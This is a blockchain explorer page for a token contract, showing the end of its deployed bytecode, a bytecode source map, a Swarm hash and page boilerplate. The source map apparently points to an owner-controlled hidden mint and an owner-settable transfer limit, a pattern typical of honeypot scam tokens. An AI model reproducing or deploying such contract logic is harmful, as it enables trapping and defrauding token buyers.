565b600180545f80546001600160a01b038084166001600160a01b0319928316811784559190931692851692831790935560405183917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e091a35050565b602081525f82518060208401528060208501604085015e5f604082850101526040601f19601f83011684010191505092915050565b80356001600160a01b0381168114610abd575f80fd5b919050565b5f8060408385031215610ad3575f80fd5b610adc83610aa7565b946020939093013593505050565b5f805f60608486031215610afc575f80fd5b610b0584610aa7565b9250610b1360208501610aa7565b929592945050506040919091013590565b5f60208284031215610b34575f80fd5b610b3d82610aa7565b9392505050565b5f8060408385031215610b55575f80fd5b610b5e83610aa7565b9150610b6c60208401610aa7565b90509250929050565b5f60208284031215610b85575f80fd5b5035919050565b600181811c90821680610ba057607f821691505b602082108103610bbe57634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b8181038181111561032b5761032b610bc4565b8082018082111561032b5761032b610bc4565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260408201526060019056fea264697066735822122060e3d0d84f896f16a0d48e2435b34cc491bfe69b50a70d0b64ee695972a2021264736f6c634300081a0033

Deployed Bytecode Sourcemap

19484:484:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;9296:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11604:210;;;;;;:::i;:::-;;:::i;:::-;;;1085:14:1;;1078:22;1060:41;;1048:2;1033:18;11604:210:0;920:187:1;10416:108:0;10504:12;;10416:108;;;1258:25:1;;;1246:2;1231:18;10416:108:0;1112:177:1;12296:493:0;;;;;;:::i;:::-;;:::i;19863:100::-;;;1845:4:1;19946:9:0;1833:17:1;1815:36;;1803:2;1788:18;19863:100:0;1673:184:1;13198:297:0;;;;;;:::i;:::-;;:::i;10587:177::-;;;;;;:::i;:::-;-1:-1:-1;;;;;10738:18:0;10706:7;10738:18;;;:9;:18;;;;;;;10587:177;6566:94;;;:::i;:::-;;5894:108;5988:6;;5894:108;;-1:-1:-1;;;;;5988:6:0;;;2199:51:1;;2187:2;2172:18;5894:108:0;2053:203:1;9515:104:0;;;:::i;13998:446::-;;;;;;:::i;:::-;;:::i;10977:216::-;;;;;;:::i;:::-;;:::i;11256:201::-;;;;;;:::i;:::-;-1:-1:-1;;;;;11422:18:0;;;11390:7;11422:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;11256:201;8705:29;;;;;;6815:229;;;;;;:::i;:::-;;:::i;16179:80::-;;;;;;:::i;:::-;;:::i;9296:100::-;9350:13;9383:5;9376:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;9296:100;:::o;11604:210::-;11723:4;11745:39;4363:10;11768:7;11777:6;11745:8;:39::i;:::-;-1:-1:-1;11802:4:0;11604:210;;;;;:::o;12296:493::-;12436:4;12453:36;12463:6;12471:9;12482:6;12453:9;:36::i;:::-;-1:-1:-1;;;;;12529:19:0;;12502:24;12529:19;;;:11;:19;;;;;;;;4363:10;12529:33;;;;;;;;12595:26;;;;12573:116;;;;-1:-1:-1;;;12573:116:0;;3344:2:1;12573:116:0;;;3326:21:1;3383:2;3363:18;;;3356:30;3422:34;3402:18;;;3395:62;-1:-1:-1;;;3473:18:1;;;3466:38;3521:19;;12573:116:0;;;;;;;;;12700:57;12709:6;4363:10;12731:25;12750:6;12731:16;:25;:::i;:::-;12700:8;:57::i;:::-;-1:-1:-1;12777:4:0;;12296:493;-1:-1:-1;;;;12296:493:0:o;13198:297::-;4363:10;13313:4;13407:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;13407:34:0;;;;;;;;;;13313:4;;13335:130;;13385:7;;13407:47;;13444:10;;13407:47;:::i;6566:94::-;4363:10;6135:7;5988:6;;-1:-1:-1;;;;;5988:6:0;;5894:108;6135:7;-1:-1:-1;;;;;6135:23:0;;6127:68;;;;-1:-1:-1;;;6127:68:0;;;;;;;:::i;:::-;6631:21:::1;6649:1;6631:9;:21::i;:::-;6566:94::o:0;9515:104::-;9571:13;9604:7;9597:14;;;;;:::i;13998:446::-;4363:10;14118:4;14167:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;14167:34:0;;;;;;;;;;14234:35;;;;14212:122;;;;-1:-1:-1;;;14212:122:0;;4509:2:1;14212:122:0;;;4491:21:1;4548:2;4528:18;;;4521:30;4587:34;4567:18;;;4560:62;-1:-1:-1;;;4638:18:1;;;4631:35;4683:19;;14212:122:0;4307:401:1;14212:122:0;14345:67;4363:10;14368:7;14377:34;14396:15;14377:16;:34;:::i;14345:67::-;-1:-1:-1;14432:4:0;;13998:446;-1:-1:-1;;;13998:446:0:o;10977:216::-;11099:4;11121:42;4363:10;11145:9;11156:6;11121:9;:42::i;6815:229::-;4363:10;6135:7;5988:6;;-1:-1:-1;;;;;5988:6:0;;5894:108;6135:7;-1:-1:-1;;;;;6135:23:0;;6127:68;;;;-1:-1:-1;;;6127:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;6918:22:0;::::1;6896:110;;;::::0;-1:-1:-1;;;6896:110:0;;4915:2:1;6896:110:0::1;::::0;::::1;4897:21:1::0;4954:2;4934:18;;;4927:30;4993:34;4973:18;;;4966:62;-1:-1:-1;;;5044:18:1;;;5037:36;5090:19;;6896:110:0::1;4713:402:1::0;6896:110:0::1;7017:19;7027:8;7017:9;:19::i;:::-;6815:229:::0;:::o;16179:80::-;4363:10;6135:7;5988:6;;-1:-1:-1;;;;;5988:6:0;;5894:108;6135:7;-1:-1:-1;;;;;6135:23:0;;6127:68;;;;-1:-1:-1;;;6127:68:0;;;;;;;:::i;:::-;16239:5:::1;:12:::0;16179:80::o;18144:380::-;-1:-1:-1;;;;;18280:19:0;;18272:68;;;;-1:-1:-1;;;18272:68:0;;5322:2:1;18272:68:0;;;5304:21:1;5361:2;5341:18;;;5334:30;5400:34;5380:18;;;5373:62;-1:-1:-1;;;5451:18:1;;;5444:34;5495:19;;18272:68:0;5120:400:1;18272:68:0;-1:-1:-1;;;;;18359:21:0;;18351:68;;;;-1:-1:-1;;;18351:68:0;;5727:2:1;18351:68:0;;;5709:21:1;5766:2;5746:18;;;5739:30;5805:34;5785:18;;;5778:62;-1:-1:-1;;;5856:18:1;;;5849:32;5898:19;;18351:68:0;5525:398:1;18351:68:0;-1:-1:-1;;;;;18432:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;18484:32;;1258:25:1;;;18484:32:0;;1231:18:1;18484:32:0;;;;;;;;18144:380;;;:::o;14934:1146::-;-1:-1:-1;;;;;15074:20:0;;15066:70;;;;-1:-1:-1;;;15066:70:0;;6130:2:1;15066:70:0;;;6112:21:1;6169:2;6149:18;;;6142:30;6208:34;6188:18;;;6181:62;-1:-1:-1;;;6259:18:1;;;6252:35;6304:19;;15066:70:0;5928:401:1;15066:70:0;-1:-1:-1;;;;;15155:23:0;;15147:71;;;;-1:-1:-1;;;15147:71:0;;6536:2:1;15147:71:0;;;6518:21:1;6575:2;6555:18;;;6548:30;6614:34;6594:18;;;6587:62;-1:-1:-1;;;6665:18:1;;;6658:33;6708:19;;15147:71:0;6334:399:1;15147:71:0;15305:6;;-1:-1:-1;;;;;15295:16:0;;;15305:6;;15295:16;:39;;;;-1:-1:-1;15328:6:0;;-1:-1:-1;;;;;15315:19:0;;;15328:6;;15315:19;15295:39;15291:782;;;15430:6;15414:12;;:22;;;;;;;:::i;:::-;;;;-1:-1:-1;;;;;;;15451:17:0;;;;;;:9;:17;;;;;:27;;15472:6;;15451:17;:27;;15472:6;;15451:27;:::i;:::-;;;;-1:-1:-1;;15498:36:0;;1258:25:1;;;-1:-1:-1;;;;;15498:36:0;;;15515:1;;15498:36;;1246:2:1;1231:18;15498:36:0;1112:177:1;15291:782:0;-1:-1:-1;;;;;15600:17:0;;15576:21;15600:17;;;:9;:17;;;;;;15658:23;;;;15632:123;;;;-1:-1:-1;;;15632:123:0;;6940:2:1;15632:123:0;;;6922:21:1;6979:2;6959:18;;;6952:30;7018:34;6998:18;;;6991:62;-1:-1:-1;;;7069:18:1;;;7062:36;7115:19;;15632:123:0;6738:402:1;15632:123:0;15806:5;;15796:6;:15;;:36;;;-1:-1:-1;5988:6:0;;-1:-1:-1;;;;;15815:17:0;;;5988:6;;15815:17;15796:36;15770:132;;;;-1:-1:-1;;;15770:132:0;;7347:2:1;15770:132:0;;;7329:21:1;7386:2;7366:18;;;7359:30;7425:34;7405:18;;;7398:62;-1:-1:-1;;;7476:18:1;;;7469:32;7518:19;;15770:132:0;7145:398:1;15770:132:0;15937:22;15953:6;15937:13;:22;:::i;:::-;-1:-1:-1;;;;;15917:17:0;;;;;;;:9;:17;;;;;;:42;;;;15974:20;;;;;;;;:30;;15998:6;;15917:17;15974:30;;15998:6;;15974:30;:::i;:::-;;;;;;;;16043:9;-1:-1:-1;;;;;16026:35:0;16035:6;-1:-1:-1;;;;;16026:35:0;;16054:6;16026:35;;;;1258:25:1;;1246:2;1231:18;;1112:177;16026:35:0;;;;;;;;15561:512;14934:1146;;;:::o;7052:201::-;7127:6;;;7108:16;7144:17;;-1:-1:-1;;;;;7127:6:0;;;-1:-1:-1;;;;;;7144:17:0;;;;;;;7172;;;;;;;;;;;;;7205:40;;7127:6;;7205:40;;;7097:156;7052:201;:::o;14:418:1:-;163:2;152:9;145:21;126:4;195:6;189:13;238:6;233:2;222:9;218:18;211:34;297:6;292:2;284:6;280:15;275:2;264:9;260:18;254:50;353:1;348:2;339:6;328:9;324:22;320:31;313:42;423:2;416;412:7;407:2;399:6;395:15;391:29;380:9;376:45;372:54;364:62;;;14:418;;;;:::o;437:173::-;505:20;;-1:-1:-1;;;;;554:31:1;;544:42;;534:70;;600:1;597;590:12;534:70;437:173;;;:::o;615:300::-;683:6;691;744:2;732:9;723:7;719:23;715:32;712:52;;;760:1;757;750:12;712:52;783:29;802:9;783:29;:::i;:::-;773:39;881:2;866:18;;;;853:32;;-1:-1:-1;;;615:300:1:o;1294:374::-;1371:6;1379;1387;1440:2;1428:9;1419:7;1415:23;1411:32;1408:52;;;1456:1;1453;1446:12;1408:52;1479:29;1498:9;1479:29;:::i;:::-;1469:39;;1527:38;1561:2;1550:9;1546:18;1527:38;:::i;:::-;1294:374;;1517:48;;-1:-1:-1;;;1634:2:1;1619:18;;;;1606:32;;1294:374::o;1862:186::-;1921:6;1974:2;1962:9;1953:7;1949:23;1945:32;1942:52;;;1990:1;1987;1980:12;1942:52;2013:29;2032:9;2013:29;:::i;:::-;2003:39;1862:186;-1:-1:-1;;;1862:186:1:o;2261:260::-;2329:6;2337;2390:2;2378:9;2369:7;2365:23;2361:32;2358:52;;;2406:1;2403;2396:12;2358:52;2429:29;2448:9;2429:29;:::i;:::-;2419:39;;2477:38;2511:2;2500:9;2496:18;2477:38;:::i;:::-;2467:48;;2261:260;;;;;:::o;2526:226::-;2585:6;2638:2;2626:9;2617:7;2613:23;2609:32;2606:52;;;2654:1;2651;2644:12;2606:52;-1:-1:-1;2699:23:1;;2526:226;-1:-1:-1;2526:226:1:o;2757:380::-;2836:1;2832:12;;;;2879;;;2900:61;;2954:4;2946:6;2942:17;2932:27;;2900:61;3007:2;2999:6;2996:14;2976:18;2973:38;2970:161;;3053:10;3048:3;3044:20;3041:1;3034:31;3088:4;3085:1;3078:15;3116:4;3113:1;3106:15;2970:161;;2757:380;;;:::o;3551:127::-;3612:10;3607:3;3603:20;3600:1;3593:31;3643:4;3640:1;3633:15;3667:4;3664:1;3657:15;3683:128;3750:9;;;3771:11;;;3768:37;;;3785:18;;:::i;3816:125::-;3881:9;;;3902:10;;;3899:36;;;3915:18;;:::i;3946:356::-;4148:2;4130:21;;;4167:18;;;4160:30;4226:34;4221:2;4206:18;;4199:62;4293:2;4278:18;;3946:356::o

Swarm Source

ipfs://60e3d0d84f896f16a0d48e2435b34cc491bfe69b50a70d0b64ee695972a20212
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.